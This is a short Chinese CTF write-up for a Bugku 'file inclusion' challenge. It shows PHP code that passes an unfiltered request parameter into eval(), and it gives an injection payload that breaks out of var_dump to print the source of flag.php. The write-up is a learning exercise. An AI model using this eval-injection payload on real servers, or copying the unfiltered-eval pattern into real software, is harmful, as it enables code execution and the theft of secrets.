1. 程式人生 > >Bugku_CTF Writeup 之 文件包含(60)

Bugku_CTF Writeup 之 文件包含(60)

命令 line ati 輸入 bsp val 進行 pos 獲取

題目說明:

地址:http://120.24.86.145:8003/

1. 打開頁面發現給出了php源碼

1 <?php 
2     include "flag.php"; 
3     $a = @$_REQUEST[‘hello‘]; 
4     eval( "var_dump($a);"); 
5     show_source(__FILE__); 
6 ?>

2.flag應該在flag.php裏,想辦法將其爆出

  (1)a變量由$_REQUEST變量獲取,可以用GET或POST方法為hello賦值進而為$a賦值

  (2)程序並未對hello的輸入進行判斷過濾

  (3)eval函數中執行的命令進而可以被$a的值所決定

3.類似於構造SQL註入語句,構造hello的值為 1);show_source("flag.php);var_dump(1

  GET方法傳參後,eval函數實際執行的命令是  var_dump(1);show_source("flag.php");var_dump(1);
  即可得到flag.php的源碼並得到flag

Bugku_CTF Writeup 之 文件包含(60)